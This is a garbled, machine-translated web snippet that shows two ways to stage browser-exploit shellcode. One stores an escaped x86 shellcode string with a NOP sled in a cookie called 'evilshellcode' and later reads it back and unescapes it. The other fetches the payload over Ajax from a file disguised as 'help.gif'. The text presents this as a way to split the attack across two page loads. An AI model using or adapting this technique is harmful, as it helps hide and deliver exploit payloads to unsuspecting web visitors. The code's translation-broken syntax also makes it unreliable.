Cookie sample code:
Copy codeThe Code is as follows:
// Store
Function setCookie (sVar, sVal ){
TheCookie = sVar + '=' + sVal + '; expires = Fri, 1 Jul 2020 09:45:27 UTC ';
Document. cookie = theCookie ;}
Shellcode = "% 9090% 9090% 00e8% 0000% 5e00% 8b64% 303d % 0000% 8100% 00c7% 0008% 8b00% 83c7% 1dc0% 20b9% 0001% a500 % fde2 % e0ff % 00e8% 0000% 6a00% eb08 % 1b6c % 46c6% ed79 % ef56 % 9836% 8afe % aa0e % 0dfc % 9e7c % bbf9 % b035 % 2d49% 7edb % e2d8 % 8e73% 0e4e % 75ec ......"
SetCookie ('evilshellcode', shellcode );
// Retrieve
Function getCookie (sVar ){
Cookies = document. cookie. split (';');
For (var I = 1; I <= cookies. length; I ++ ){
If (cookies [I-1]. split ('=') [0] = sVar) {return cookies [I-1]. split ('=') [1];}
Return '';
}
A = unescape (getCookie ('evilshellcode '))
If the cookie is stored, it can be hung twice. The first cookie writing code is harmless, and the second time it is pulled and run with the new code. You can use it as needed.
Ajax to call
Copy codeThe Code is as follows:
<Script src = "http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type = "text/javascript"> </script>
Var shellcode = $. ajax ({
Url: "help.gif ",
Async: false
}). ResponseText
Help.gif content
% 9090% 9090% 00e8% 0000% 5e00% 8b64% 303d % 0000% 8100% 00c7% 0008% 8b00% 83c7% 1dc0% 20b9% 0001% a500 % fde2 % e0ff % 00e8% 0000% 6a00% eb08 % 1b6c % 46c6% ed79 % ef56 % 9836% 8afe % aa0e % 0dfc % 9e7c % bbf9 % b035 % 2d49% 7edb % e2d8 % 8e73% 0e4e % 75ec